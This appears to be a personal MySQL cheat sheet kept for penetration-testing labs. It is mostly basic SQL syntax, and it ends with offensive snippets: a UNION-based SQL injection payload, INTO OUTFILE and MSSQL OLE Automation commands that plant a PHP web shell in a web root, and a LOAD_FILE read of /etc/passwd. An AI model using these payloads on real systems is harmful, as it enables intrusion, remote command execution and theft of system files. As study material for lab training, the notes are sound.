MySQL

MySQL default system schemas/databases:

• mysql - is the system database that contains tables that store information required by the MySQL server

• information_schema - provides access to database metadata

• performance_schema - is a feature for monitoring MySQL Server execution at a low level

• sys - a set of objects that helps DBAs and developers interpret data collected by the Performance Schema

mysql -h 10.10.97.109 -u root -p

mysql -h 10.10.97.109 -u root -pPassword123

show databases;

Tryhackme - network services 2

mysql -u root -p

• If you're already in the box

SHOW GRANTS FOR 'u1'@'localhost';

https://dev.mysql.com/doc/refman/8.0/en/show-grants.html

mysql -u root -h docker.hackthebox.eu -P 3306 -p 

show databases;
use "database name";

show tables;
SELECT * FROM table_name;

Describe table_name;

INSERT INTO logins VALUES(1, 'admin', 'p@ssw0rd', '2020-07-02');

INSERT INTO logins(username, password) VALUES ('john', 'john123!'), ('tom', 'tom123!');

DROP TABLE logins;

ALTER TABLE logins ADD newColumn INT;

ALTER TABLE logins RENAME COLUMN newColumn TO oldColumn;

ALTER TABLE logins MODIFY oldColumn DATE;

ALTER TABLE logins DROP oldColumn;

UPDATE logins SET password = 'change_password' WHERE id > 1;

SELECT * FROM logins ORDER BY password;

SELECT * FROM logins ORDER BY password DESC;

SELECT * FROM logins ORDER BY password DESC, id ASC;

SELECT * FROM logins LIMIT 2;

SELECT * FROM logins LIMIT 1, 2;

SELECT * FROM logins WHERE id > 1;

SELECT * FROM logins where username = 'admin';

SELECT * FROM logins WHERE username LIKE 'admin%';

SELECT * FROM logins WHERE username like '___';

select first_name,hire_date from employees where first_name like 'Bar%' and hire_date = '1990-01-01';

SELECT 1 = 1 AND 'test' = 'test';
= 1

SELECT 1 = 1 AND 'test' = 'abc';
= 0 

SELECT 1 = 1 OR 'test' = 'abc';
= 1

SELECT 1 = 2 OR 'test' = 'abc';
= 0 

SELECT NOT 1 = 1;
= 0 

SELECT NOT 1 = 2;
= 1

SELECT 1 = 1 && 'test' = 'abc';
= 0

SELECT 1 = 1 || 'test' = 'abc';
= 1

SELECT 1 != 1;
= 0

SELECT * FROM logins WHERE username != 'john';

SELECT * FROM logins WHERE username != 'john' AND id > 1;

# This will return the tables users from my_database
SELECT * FROM my_database.users;

# This will return database names from the database metadata
SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA;

cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -

SHOW VARIABLES LIKE 'secure_file_priv';

SELECT variable_name, variable_value FROM information_schema.global_variables where variable_name="secure_file_priv"

SELECT 'this is a test' INTO OUTFILE '/tmp/test.txt';
SELECT * from users INTO OUTFILE '/tmp/test.txt';
> linux = cat /tmp/test.txt 
> linux = ls -la /tmp/test.txt (Will be owned by mysql)

# Will create a php shell exec in www directory
SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php';

# OLE Automation Procedures
# Enabling the OLE
1> sp_configure 'show advanced options', 1
2> GO
3> RECONFIGURE
4> GO
5> sp_configure 'Ole Automation Procedures', 1
6> GO
7> RECONFIGURE
8> GO

# Creating a file
1> DECLARE @OLE INT
2> DECLARE @FileID INT
3> EXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT
4> EXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'c:\inetpub\wwwroot\webshell.php', 8, 1
5> EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '<?php echo shell_exec($_GET["c"]);?>'
6> EXECUTE sp_OADestroy @FileID
7> EXECUTE sp_OADestroy @OLE
8> GO

# It will read the /etc/passwd
select LOAD_FILE("/etc/passwd");